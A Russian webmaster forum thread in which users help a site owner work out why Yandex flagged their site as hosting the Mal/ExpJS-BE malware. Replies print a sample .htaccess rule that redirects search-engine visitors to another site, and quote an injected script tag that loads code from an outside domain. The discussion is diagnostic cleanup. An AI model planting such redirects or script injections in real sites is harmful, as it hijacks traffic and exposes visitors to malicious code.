Вредоносный код: Mal/ExpJS-BE (по данным компании Sophos)

12 3
F0
На сайте с 23.10.2012
Offline
4
6100

Здравствуйте.

Получил заглушку от яндекса:

Сайт может угрожать безопасности вашего компьютера или мобильного устройства/

Пишет что содержит Mal/ExpJS-BE - что это такое я так и не смог найти.

Скажу сразу что сайт не взламывали, по логам все чисто.

Рекламодатели все белые и работают уже много лет.

Из последнего была добавлена партнерка selectornews.com

В вебмастере яндекса - Результат выборочной проверки:

фигурируют три сайта nseurope.ru nobile-mondi.net nobile-mondi.org

По всем онлайн проверкам включая antivirus-alarm.ru на сайте вирусов нету

Помогите пожалуйста кто может.

ProTeg
На сайте с 09.06.2008
Offline
226
#1

Отправьте на перепроверку и всё... Было несколько раз, что яндекс ошибался... Если действительно ничего нет, то всё нормализуется..

F0
На сайте с 23.10.2012
Offline
4
#2

еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?

X
На сайте с 11.07.2011
Offline
57
#3
Film09:
еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?

такое может быть когда вирусня на сайте отрабатывает по реферер

F0
На сайте с 23.10.2012
Offline
4
#4

Вот информация о вирусе: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal~ExpJS-BE/detailed-analysis.aspx

ТАм наппсано:

Размер 14K

SHA-1 4cca5efb6ac291a891c3e7c9e75203c5ba22f417

MD5 9f612e80cc52fb154030d7b54f44f935

CRC-32 7074252f

Тип файла Язык Разметки Гипертекста

Что значит тип файла Язык Разметки Гипертекста ?

как же мне найти этот код уже все перерыл(( ничего не находит

---------- Добавлено 01.05.2013 в 22:40 ----------

x0xa:
такое может быть когда вирусня на сайте отрабатывает по реферер

почему когда просто заходишь он меня не перекидывает и других пользователей тоже ??

X
На сайте с 11.07.2011
Offline
57
#5

по этим данным ты ничего и не найдешь

сигнатур я там не вижу

Язык Разметки Гипертекста - обычная html страничка

---------- Добавлено 01.05.2013 в 22:42 ----------

вирус может быть зашифрован и тогда он не будет искаться даже по известным сигнатурам

сайт покажи хоть свой

atranca
На сайте с 27.02.2011
Offline
126
#6
Film09:
еще такое заметил когда открываешь ( в поиске яндекса) свою копию сайта, попадаешь на другой сайт. Как такое может быть?

Ну вот а говориш сайт не взломан....

Выложи ка сюда хтасес из корня сайта- покажу часть кода где поисковый трафф тырят

123
X
На сайте с 11.07.2011
Offline
57
#7
atranca:
Ну вот а говориш сайт не взломан....
Выложи ка сюда хтасес из корня сайта- покажу часть кода где поисковый трафф тырят

врядли это .htaccess судя по названию виря

---------- Добавлено 01.05.2013 в 22:46 ----------

хотя и его проверить не помешает :)

---------- Добавлено 01.05.2013 в 22:47 ----------

Film09:
почему когда просто заходишь он меня не перекидывает и других пользователей тоже ??

потому что он перекидывает только тех, кто идет с поиска

F0
На сайте с 23.10.2012
Offline
4
#8

отправил сайт в личку

atranca
На сайте с 27.02.2011
Offline
126
#9
x0xa:


потому что он перекидывает только тех, кто идет с поиска

могу поспорить что в хтасесе он найдет примерно такие строчки

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]

RewriteRule ^.*$ http://САЙТ_КУДА_ПЕРЕКИДЫВАЕТ_С_ПОИСКА [L,R]

</IfModule>

X
На сайте с 11.07.2011
Offline
57
#10

<!--U1BFOOTER1Z--><div align="center"><script charset="utf-8" src="http://js.sn00.net/00/66/39.js"></script>

что это ?

---------- Добавлено 01.05.2013 в 23:05 ----------

найди где подключается и удали

потом проверь снова с яндекса

---------- Добавлено 01.05.2013 в 23:05 ----------

atranca:
могу поспорить что в хтасесе он найдет примерно такие строчки

надо было спорить :)

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий